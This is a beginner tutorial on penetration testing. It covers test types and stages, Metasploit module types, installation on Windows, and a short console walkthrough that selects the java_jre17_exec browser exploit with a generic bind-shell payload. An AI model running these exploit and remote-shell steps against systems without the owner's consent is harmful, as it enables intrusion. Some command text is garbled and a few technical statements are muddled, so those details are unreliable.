Penetration testing which is also referred to as pen testing or security testing is a practice that involves attacking information systems in a similar way an attacker would with the objective of identifying vulnerabilities. The distinguishing characteristics of pen testing are no harm is done on the systems and the consent of the owner of the system is required. A vulnerability can be defined as a security weakness that exists in a part of an information system that provides an entry point for an attack. Vulnerabilities in a system can arise from bugs and errors in design and configuration among others. The most common attack entry points are browsers, social engineering, SQL injection, flash, web 2.0 and ActiveX. In this article, we will be discussing Penetration Testing & Metasploit by the demonstration of windows installation.
Due to different attack scenarios different penetration testing types are needed. The three types of testing that can be used are black box, white box and grey box testing. In black box testing no information about the system is provided to the person undertaking the testing. It is the responsibility of the tester to gather information about the system. In white box testing complete information about the target system is provided. Such testing is very useful for understanding the impact of an internal attack. In gray box testing the tester is provided with some information about the system. Such a test provides an understanding of the impact of an external attack.
A Penetration Testing & Metasploit process can be broken down into Four stages.
The first stage is Planning the test. The objective of the first stage is identifying the scope and strategy of carrying out the test. The scope of the test is informed by currently practiced policies and standards.
The second stage of testing is Discovery. There are three activities that are carried out in this stage. The first activity is gathering system information and the data it holds. This activity is referred to as fingerprinting. The second activity is scanning and probing system ports. The third activity is identifying any vulnerabilities the system may have.
The third stage of testing is Attack. This stage involves identifying exploits for vulnerabilities. An exploit is a computer program whose objective is to utilize a vulnerability in order to gain access to a system. After gaining access to a system a payload is the software that enables control of the compromised system. The exploit is used to deliver the payload.
The fourth stage is Reporting. The objective of this stage is creating a detailed report of identified vulnerabilities, their impact on business and solutions.
Although there are many tools to facilitate penetration testing Metaspoilt is one of the widely used tools. This tutorial will focus on demonstrating use of Metaspoilt. Metasploit is offered as a free community edition and a paid pro edition which is available for a 14 day trial. Metasploit is supported on Windows, Ubuntu and Redhat operating systems. The latest versions of Chrome, Firefox and Internet Explorer are supported.
The Metasploit framework is organized into modules. The first type of module is exploit. Exploit modules are designed to take advantage of system weaknesses. Examples are buffer overflow, application exploits and code injection. Auxiliary modules perform actions that do not directly take advantage of weaknesses. For example scanning and service denial. Post-exploitation modules are aimed at information gathering on target systems. Payload modules run after a weakness has been successfully exploited. The payload provides the means to control an exploited system. With the payload you are able to open a meterpreter to write DLL files. NOP generator modules are for creation of random bytes to circumvent standard ID signatures.
This tutorial will focus on demonstrating a Windows installation. For simplicity we will use the bundled installer available here. Download the installer and follow the prompts to complete installation. To confirm a successful installation start a command prompt as an administrator and issue the commanmsfvenom.bat –helpd. You should get output shown in the image below showing available options.
To list all available payloads use the command msfvenom.bat –list payloads. Available payloads will be listed as shown in the image below
To start the Metasploit console use the command msfconsole.bat. You will then have access to msf console which is the command line tool for using Metasploit.
To list available exploits use the command help search. To search for a specific exploit you can use CVE number, name or platform. For example to list exploits for the year 2018 use the command search cve:2018
To gather more information about an exploit pass the url of the exploit to info command for example info exploit/multi/browser/java_jre17_exec.
After identifying an interesting exploit we use the command use for example use exploit/multi/browser/java_jre17_exec. After issuing the command we are using the specified exploit and we can set options using set command for example to set local host and local port we use the commands below
set SRVHOST 0.0.0.0
set SRVPORT 8080
To check variables that can be set you use the command show options
When an exploit has multiple targets we can set a specific target by specifying an ID to the set target command. Available targets are listed using the command show targets.
To list available payloads issue the command show payloads
To specify a payload and its options we use the commands shown below
set payload generic/shell_bind_tcp
set LPORT 8080
To run the exploit you issue the command exploit
This tutorial introduced penetration testing as an approach for identifying weaknesses of an information system. Most common vulnerabilities were highlighted. The different types of penetration tests were discussed. The different stages in a penetration testing were also discussed. A brief overview of the Metasploit framework was given. Finally use of Metasploit was demonstrated.